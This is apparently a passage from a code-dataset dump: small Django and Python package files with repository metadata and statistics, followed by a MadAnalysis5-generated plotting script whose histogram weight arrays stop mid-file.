"MIT"
] | null | null | null | from django.contrib import admin
from .models import Vendor
# Register your models here.
#admin.site.register(UserProfile)
admin.site.register(Vendor)
| 21.857143 | 33 | 0.803922 | 21 | 153 | 5.857143 | 0.571429 | 0.146341 | 0.276423 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 153 | 6 | 34 | 25.5 | 0.904412 | 0.379085 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f2df54d32df5bab55b6ae7f2965a3305bbd45710 | 45 | py | Python | kreta/__main__.py | UnknownPlayer78/kreta-cli | 08c8a34ef17fa484e8bbb4785e744dc775541daa | [
"MIT"
] | 1 | 2020-04-11T19:56:50.000Z | 2020-04-11T19:56:50.000Z | kreta/__main__.py | UnknownPlayer78/kreta-cli | 08c8a34ef17fa484e8bbb4785e744dc775541daa | [
"MIT"
] | 1 | 2020-04-21T11:06:01.000Z | 2020-04-21T11:06:01.000Z | kreta/__main__.py | UnknownPlayer78/kreta-cli | 08c8a34ef17fa484e8bbb4785e744dc775541daa | [
"MIT"
] | null | null | null | import kreta
import sys
kreta.main(sys.argv) | 11.25 | 20 | 0.8 | 8 | 45 | 4.5 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 45 | 4 | 20 | 11.25 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f2ef48a3f6a1887872cca17042cd215e63f1c00f | 29 | py | Python | project/apps/django_backend_template/errors/__init__.py | adosaa/Backend-django-app | 3a7eb746ebc703e2cdbf1e4b2ac5703b3fedcd85 | [
"MIT"
] | 2 | 2020-11-04T21:47:48.000Z | 2020-11-04T21:47:50.000Z | project/apps/django_backend_template/errors/__init__.py | adosaa/Backend-Django-App | 3a7eb746ebc703e2cdbf1e4b2ac5703b3fedcd85 | [
"MIT"
] | null | null | null | project/apps/django_backend_template/errors/__init__.py | adosaa/Backend-Django-App | 3a7eb746ebc703e2cdbf1e4b2ac5703b3fedcd85 | [
"MIT"
] | null | null | null | from .student_error import *
| 14.5 | 28 | 0.793103 | 4 | 29 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.88 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
842eff326cca7b8e72344e462e7c463d2ce71ac9 | 89 | py | Python | omtool/datamodel/__init__.py | Kraysent/Galactic-archeology | 51ab18f4bdfc75c1c9eebd745f841b02c57d2d64 | [
"Apache-2.0"
] | 1 | 2021-11-27T16:24:07.000Z | 2021-11-27T16:24:07.000Z | omtool/datamodel/__init__.py | Kraysent/Galactic-archeology | 51ab18f4bdfc75c1c9eebd745f841b02c57d2d64 | [
"Apache-2.0"
] | 32 | 2021-09-12T16:57:03.000Z | 2021-12-04T09:06:54.000Z | omtool/datamodel/__init__.py | Kraysent/Galactic-archeology | 51ab18f4bdfc75c1c9eebd745f841b02c57d2d64 | [
"Apache-2.0"
] | null | null | null | from omtool.datamodel.snapshot import Snapshot
from omtool.datamodel.config import Config | 44.5 | 46 | 0.876404 | 12 | 89 | 6.5 | 0.5 | 0.25641 | 0.487179 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078652 | 89 | 2 | 47 | 44.5 | 0.95122 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
845f58647c6cca5b4f3b59c1a12eb982fecd74e7 | 225 | py | Python | friendcircle/admin.py | jossafossa/Project24_backend | bb5cc91d21c9f93034b85b3e94e829f7ab33c565 | [
"MIT"
] | null | null | null | friendcircle/admin.py | jossafossa/Project24_backend | bb5cc91d21c9f93034b85b3e94e829f7ab33c565 | [
"MIT"
] | 9 | 2019-12-04T23:15:59.000Z | 2022-02-10T09:08:38.000Z | friendcircle/admin.py | jossafossa/Project24_backend | bb5cc91d21c9f93034b85b3e94e829f7ab33c565 | [
"MIT"
] | null | null | null | from django.contrib import admin
from . import models
# Register your models here.
admin.site.register(models.FriendCircle)
admin.site.register(models.FriendCircleMembership)
admin.site.register(models.FriendCircleMatcher)
| 25 | 50 | 0.835556 | 27 | 225 | 6.962963 | 0.481481 | 0.143617 | 0.271277 | 0.367021 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08 | 225 | 8 | 51 | 28.125 | 0.908213 | 0.115556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
8461f368189abd9815aa24fa81d620912cddea45 | 45,067 | py | Python | post_optimization_studies/mad_analyses/ma100MeV_L1pt8-2pt4TeV_deta2pt6/Output/Histos/MadAnalysis5job_0/selection_4.py | sheride/axion_pheno | 7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5 | [
"MIT"
] | null | null | null | post_optimization_studies/mad_analyses/ma100MeV_L1pt8-2pt4TeV_deta2pt6/Output/Histos/MadAnalysis5job_0/selection_4.py | sheride/axion_pheno | 7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5 | [
"MIT"
] | null | null | null | post_optimization_studies/mad_analyses/ma100MeV_L1pt8-2pt4TeV_deta2pt6/Output/Histos/MadAnalysis5job_0/selection_4.py | sheride/axion_pheno | 7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5 | [
"MIT"
] | null | null | null | def selection_4():
# Library import
import numpy
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
# Library version
matplotlib_version = matplotlib.__version__
numpy_version = numpy.__version__
# Histo binning
xBinning = numpy.linspace(-8.0,8.0,161,endpoint=True)
# Creating data sequence: middle of each bin
xData = numpy.array([-7.95,-7.85,-7.75,-7.65,-7.55,-7.45,-7.35,-7.25,-7.15,-7.05,-6.95,-6.85,-6.75,-6.65,-6.55,-6.45,-6.35,-6.25,-6.15,-6.05,-5.95,-5.85,-5.75,-5.65,-5.55,-5.45,-5.35,-5.25,-5.15,-5.05,-4.95,-4.85,-4.75,-4.65,-4.55,-4.45,-4.35,-4.25,-4.15,-4.05,-3.95,-3.85,-3.75,-3.65,-3.55,-3.45,-3.35,-3.25,-3.15,-3.05,-2.95,-2.85,-2.75,-2.65,-2.55,-2.45,-2.35,-2.25,-2.15,-2.05,-1.95,-1.85,-1.75,-1.65,-1.55,-1.45,-1.35,-1.25,-1.15,-1.05,-0.95,-0.85,-0.75,-0.65,-0.55,-0.45,-0.35,-0.25,-0.15,-0.05,0.05,0.15,0.25,0.35,0.45,0.55,0.65,0.75,0.85,0.95,1.05,1.15,1.25,1.35,1.45,1.55,1.65,1.75,1.85,1.95,2.05,2.15,2.25,2.35,2.45,2.55,2.65,2.75,2.85,2.95,3.05,3.15,3.25,3.35,3.45,3.55,3.65,3.75,3.85,3.95,4.05,4.15,4.25,4.35,4.45,4.55,4.65,4.75,4.85,4.95,5.05,5.15,5.25,5.35,5.45,5.55,5.65,5.75,5.85,5.95,6.05,6.15,6.25,6.35,6.45,6.55,6.65,6.75,6.85,6.95,7.05,7.15,7.25,7.35,7.45,7.55,7.65,7.75,7.85,7.95])
# Creating weights for histo: y5_ETA_0
y5_ETA_0_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00176902901165,0.199900298717,0.221128656457,0.24589505382,0.254740212878,0.369727080635,0.367958080824,0.431643154043,0.463485550653,0.56785833954,0.569627539352,0.659847929746,0.741223121082,0.833212711288,0.840288710535,0.836750710912,0.992425494337,1.05080348812,0.992425494337,1.10387428247,1.20470867174,1.26131786571,1.34976905629,1.34092425723,1.37807385328,1.5036746399,1.47006304348,1.46829424367,1.38868785215,1.427606648,1.29492946213,1.21532307061,1.0631866868,1.03488188982,0.925202301494,0.849133909593,0.714687923908,0.590855937092,0.555475140859,0.454640351595,0.35380584233,0.360881961577,0.22466669608,0.153905543614,0.109679788322,0.106141748699,0.0672231128428,0.0530708743496,0.0495328347263,0.0247664093631,0.0123832026816,0.0106141748699,0.0194593219282,0.0229973775515,0.0566089139729,0.0513018345379,0.0884514705826,0.125601066627,0.180440980789,0.24589505382,0.284813689676,0.359112921765,0.458178751218,0.502404346509,0.691690326356,0.734147121836,0.87743830658,0.953506698481,1.11448828134,1.22239906985,1.17817347456,1.29492946213,1.40284025064,1.37276665384,1.44352784631,1.427606648,1.39930225102,1.4116854497,1.39753305121,1.3356170578,1.28431506326,1.23832026816,1.20293987192,1.11271948153,1.05787948737,0.932278300741,0.909281103189,0.842057910347,0.753606319764,0.689921526544,0.64215753163,0.551937141236,0.474099949523,0.44933355216,0.42810515442,0.389186398564,0.329039404967,0.284813689676,0.24589505382,0.231742815326,0.130908146062,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_1
y5_ETA_1_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.123964269495,0.136780996886,0.17845040889,0.195550116838,0.22971923692,0.238287875896,0.265021892011,0.288501186629,0.367556910177,0.383601620413,0.448777705177,0.46268100507,0.509723847039,0.599484983607,0.591989367952,0.620817152446,0.658232880504,0.70416780701,0.754426081844,0.793997289012,0.821731946236,0.842036935154,0.871933066702,0.871919477551,0.924278475212,0.867667672104,0.916889574357,0.843115673911,0.806743912372,0.7511578911,0.750163884694,0.647537819219,0.628330354061,0.520448484711,0.523580783948,0.440276092688,0.368638566605,0.303462042192,0.271419464322,0.191294034805,0.158147658186,0.129307283743,0.10900221489,0.0737245798227,0.0523574788735,0.0395280376336,0.0299136975236,0.0170913626101,0.00854924246192,0.00962069503638,0.00961620262303,0.0117516497263,0.0245762788081,0.0299242171249,0.0448931982005,0.0598356284737,0.0876321563017,0.111142146413,0.137853900302,0.161386352479,0.237203381734,0.263907461749,0.325915995421,0.354788504208,0.402835584414,0.501126710815,0.542820223578,0.616582932959,0.694539494055,0.669996688523,0.791844207987,0.834558505777,0.853801142854,0.871908286486,0.929740514433,0.909381968274,0.867686457107,0.906151747216,0.874108529857,0.851672042684,0.798264682014,0.758701068783,0.722377668633,0.692441968676,0.631564571929,0.554609611175,0.53532780537,0.504351736022,0.475540338445,0.386833839876,0.357945983342,0.368651955915,0.315252149215,0.262870089966,0.246844924126,0.194495758615,0.202999409477,0.160293944635,0.136784633982,0.0908331606861,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_2
y5_ETA_2_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0937524222316,0.0944469023963,0.10833614569,0.13055895096,0.155559596888,0.165976519358,0.180560242816,0.207644249239,0.210422089898,0.245839698296,0.272923704719,0.294452069824,0.352786883657,0.39931589469,0.370148447774,0.429177701771,0.473623312311,0.482651314451,0.522235723838,0.502790919227,0.568070134707,0.533346926473,0.619460546893,0.634044150351,0.570848135366,0.582654138165,0.566681334378,0.562514533389,0.502790919227,0.49584611758,0.459734109017,0.433344502759,0.379870930079,0.381259850408,0.299313310976,0.267368023401,0.240283976979,0.193060565781,0.164587599029,0.154170636559,0.097224743055,0.097224743055,0.0618071346564,0.0541680528449,0.0354175843986,0.0263895702578,0.0201394087757,0.0104169344702,0.00694462564678,0.00694462564678,0.00416677298807,0.00625016148211,0.0152781716229,0.019444948611,0.0298618830812,0.0437511303747,0.0534736126802,0.0743074576206,0.0826410195967,0.123614309313,0.134031231783,0.177087921993,0.214588890886,0.222922412862,0.277784945871,0.328480717893,0.346536722174,0.383343250902,0.463900910005,0.475706912805,0.519457723179,0.533346926473,0.570848135366,0.574320536189,0.61459934574,0.584042938494,0.579181737342,0.595154141129,0.577098136848,0.542375328614,0.532652526308,0.483345714616,0.448622906382,0.469456511323,0.447928106217,0.397232494196,0.351397963327,0.352092443492,0.312508074105,0.298618830812,0.273618184883,0.219450132038,0.222922412862,0.201394087757,0.18403252364,0.136114632277,0.149309435406,0.113197386843,0.102780424372,0.0812520992674,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_3
y5_ETA_3_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0516829757602,0.0654334599532,0.0938828286286,0.101943471087,0.10336591152,0.134186040919,0.12707371875,0.150781485979,0.165006170317,0.198197060438,0.199145340727,0.211473384487,0.254621557644,0.250354156343,0.267423761548,0.280700125597,0.306778693549,0.344711145116,0.367470592056,0.374582914225,0.370789673068,0.379324475671,0.397342401165,0.389755918852,0.410144525069,0.405402923623,0.385488517551,0.393549160009,0.364625671189,0.340917863959,0.32337413861,0.297295570657,0.284493366753,0.252724957066,0.218111586511,0.204361062318,0.154574727136,0.137979282075,0.106210872388,0.0881929468935,0.0763390632788,0.058795297929,0.0398290721455,0.0317684256874,0.0279751805307,0.0165954450606,0.0123280437593,0.00900895474719,0.00663817802424,0.00474155744589,0.00521571359048,0.00616402187965,0.00995726703636,0.010431423181,0.0180179134944,0.0303459572537,0.034613358555,0.0545278966277,0.0602177783628,0.0630626992303,0.101469310942,0.119487196436,0.131815240196,0.146039924533,0.18492069639,0.219534026945,0.238500272728,0.288760768055,0.300140491525,0.31104609485,0.352771787574,0.383591876972,0.389755918852,0.39260083972,0.405402923623,0.416308526949,0.399239001744,0.390230078997,0.396868241021,0.372212153502,0.364151511044,0.353720067863,0.331908941212,0.324796579043,0.300614651669,0.284493366753,0.264578840681,0.239922753162,0.213370025065,0.191558858414,0.174015093064,0.148410685256,0.154100566991,0.139401762509,0.135608521352,0.121383837015,0.0862963063152,0.0796581442909,0.0815547448693,0.0526312560494,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_4
y5_ETA_4_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_5
y5_ETA_5_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,1.0521138287,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,1.0529581672,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,1.05462838872,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_6
y5_ETA_6_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.23066382848,0.0,0.0,0.0,0.0,0.69099811103,0.230610340271,0.690550070428,0.460764801152,0.229973208092,0.460868549833,0.0,0.690745655905,0.92192538431,0.461177106097,0.691462290316,0.0,0.460062384154,0.461170189518,0.690533931745,0.230742908031,0.461014566496,0.230587822965,0.460908128034,0.460429347082,0.920029088968,0.460863938781,0.23001086502,0.230176939761,0.0,0.230587822965,0.0,0.23075470464,0.0,0.229943159399,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.230742908031,0.0,0.230587822965,0.0,0.0,0.0,0.0,0.0,0.0,0.23001086502,0.23048899274,0.230635893187,0.0,0.690700698143,0.230455985289,0.459667370656,0.690855168402,0.0,0.461102176493,0.0,0.230559772396,1.61298920284,0.691325495758,0.921506931295,0.230513200765,0.691642121363,0.0,0.0,1.38141215541,0.461120236449,0.459480623029,0.0,0.460105804898,0.0,0.230541942993,0.230742908031,0.229922717067,0.230742908031,0.230578408733,0.460551539973,0.0,0.459871025475,0.0,0.690196172149,0.0,0.230610340271,0.230350853292,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_7
y5_ETA_7_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0554497187393,0.0831772132794,0.0276923255935,0.0277259711423,0.0277276753474,0.138466629021,0.110769756316,0.138467129126,0.138488556717,0.0553483897024,0.138584500004,0.0276911868921,0.277051898417,0.387609725475,0.277006619649,0.193619592942,0.498684276764,0.415236698841,0.249279240517,0.664729638219,0.553676245234,0.304793242028,0.581456712471,0.94163719854,0.581457097167,0.636367894693,0.415431355229,0.636816450718,0.360012950779,0.719644282709,0.52583422657,0.692253128248,0.443167967075,0.304538880756,0.470773397441,0.415600236957,0.332220904179,0.415136677772,0.387777837811,0.276896288716,0.166227168983,0.110941792554,0.0,0.0831001970562,0.166023049063,0.0831835607703,0.0276396529597,0.0277073672235,0.0554357157896,0.0,0.0830498787646,0.0,0.0,0.0554043630314,0.110818074186,0.193787551399,0.166214281653,0.193802939256,0.110855466678,0.304774892009,0.193723537915,0.193964203995,0.304304869924,0.360142208775,0.332415868325,0.359878307032,0.498603490516,0.609169473138,0.719912031417,0.609177167067,0.553765110107,0.8304499312,0.526001184816,0.637089585176,0.470554889874,0.44313411379,0.387617419404,0.470614902516,0.637204224709,0.332489730037,0.387508550317,0.249238501167,0.30444070623,0.360112817969,0.470799556797,0.249110628077,0.33238301525,0.221422026345,0.27701616012,0.193771240271,0.138377610269,0.193799977093,0.166182159502,0.1662747944,0.166080099542,0.0554841105992,0.0830483399789,0.0276601880546,0.0276944452707,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_8
y5_ETA_8_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0100438003315,0.0,0.020069481246,0.0403233606305,0.0201706125931,0.0807098054735,0.0403435250051,0.0302586495453,0.0806750351255,0.0705902385514,0.0605934115643,0.0806740642258,0.05041745357,0.0907537028949,0.100840926719,0.131116918961,0.201688771098,0.0907304619817,0.12090657291,0.161249035994,0.211765436387,0.181505099903,0.201655396418,0.201604181456,0.201556668048,0.25191390156,0.241885417172,0.191572177556,0.241997313371,0.181477611303,0.262121092186,0.181701828468,0.282343053241,0.231843097463,0.211727025164,0.191528790473,0.191531217722,0.100873997992,0.141230357078,0.0504588624451,0.0705737939365,0.0503704741575,0.0403452847609,0.030221506561,0.0302204567757,0.0403551029848,0.0201721417603,0.0100840866037,0.0,0.0201625601932,0.0100784735894,0.0,0.0100984680565,0.0201051071994,0.0403589016302,0.0302095462895,0.0100417371695,0.0503333675819,0.0706071686161,0.141281632722,0.0806791007683,0.141206934121,0.221696891479,0.121029573775,0.141177139635,0.201599630363,0.201670870133,0.181574579918,0.282271874152,0.342858204216,0.302265370355,0.292354486201,0.242019644065,0.211727631977,0.36291905659,0.292299751727,0.22175787612,0.191575393662,0.191545417131,0.141183511164,0.110865224101,0.121067742272,0.16122427805,0.110888161608,0.141173559442,0.0906855578675,0.0605321053121,0.0806919651903,0.100803971846,0.0302321985947,0.0806162956896,0.0302714229454,0.0504079994335,0.0201459274665,0.050354442175,0.0100580543537,0.0604864366142,0.0403263036704,0.0100840866037,0.0100909617877,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_9
y5_ETA_9_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00566295640025,0.011324135308,0.00565456525066,0.0141570004909,0.0226118050884,0.0169582401582,0.00848816143696,0.0169684241898,0.0141489171322,0.0339524572259,0.0395961843893,0.0452846220292,0.0396047640608,0.0311416760406,0.0282917323097,0.0622405152817,0.0651042788242,0.0735898432754,0.0791848663752,0.0763938953821,0.0820738302982,0.0877463782326,0.118837684291,0.0877033644534,0.116009316703,0.127320401677,0.113151670505,0.132955860807,0.147067958452,0.164110571792,0.161220607549,0.152738890484,0.147084694582,0.107533255296,0.127317323768,0.0792318814362,0.0876694305059,0.101858591299,0.0876679684991,0.0509369327115,0.0537586827953,0.0424637183704,0.0113093844288,0.0283114578595,0.0,0.0,0.00282704062473,0.00566127893981,0.00283093494918,0.0,0.0,0.0,0.00848445640392,0.00849299375419,0.00848656092425,0.0141406914203,0.00565437288134,0.0169897194731,0.0396199997107,0.039619076338,0.0480680521451,0.0622467480476,0.0735533315791,0.121700255144,0.116013164089,0.107528830802,0.124484916424,0.0933398623778,0.138657187191,0.158424096319,0.172575898991,0.118786475579,0.13295320611,0.113125700647,0.0905032229089,0.127314245858,0.1273424472,0.107518827597,0.0905340404735,0.0933439021335,0.0820341252713,0.0707311967567,0.067903521698,0.0565758160154,0.0594098777355,0.0678847464527,0.0339625950889,0.0395974155529,0.0368062791222,0.0198075798493,0.0424600248795,0.0254587170788,0.0169800432965,0.0113153478776,0.00282138458208,0.0113131817991,0.00849030827853,0.0,0.00282926633772,0.0028303705376,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_10
y5_ETA_10_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00152202209491,0.00153762419274,0.00151823557942,0.0,0.00304238781081,0.0,0.00455922692805,0.00153506755638,0.00607796580095,0.00614214280808,0.00305665842566,0.00303492701664,0.00456932942226,0.00760525948154,0.0121545256882,0.0151996757059,0.0107051019054,0.0182826908786,0.0136927843143,0.01219955037,0.0121796194757,0.0106724575342,0.0152543054957,0.0137072569554,0.0197466723662,0.0137299878627,0.0136878104515,0.0243635157645,0.0289091892119,0.0198139435649,0.0152209770708,0.0152249703383,0.0198174642564,0.0121980971987,0.0152561249134,0.00611227363972,0.0122009917269,0.00151057630332,0.0,0.00153570553403,0.00153570553403,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00303341713621,0.00608247653921,0.00764060462471,0.00153094314903,0.00915437317915,0.0166988641082,0.0106842991083,0.0137056147536,0.0258996123552,0.022795626621,0.0228577349265,0.0274276042669,0.0320015968332,0.027394866562,0.0152047677127,0.0167623901419,0.0213671001505,0.016774594418,0.0106712465581,0.00610048759338,0.00918429433087,0.0197751805155,0.0121978963539,0.0106675699166,0.00457483729596,0.0137148654295,0.0075838458799,0.00762130934516,0.00914809264363,0.00303094201922,0.00609739103891,0.00455093321861,0.00304564267826,0.0,0.0030378168191,0.0,0.0,0.0,0.00151207318791,0.0,0.0015203657159,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_11
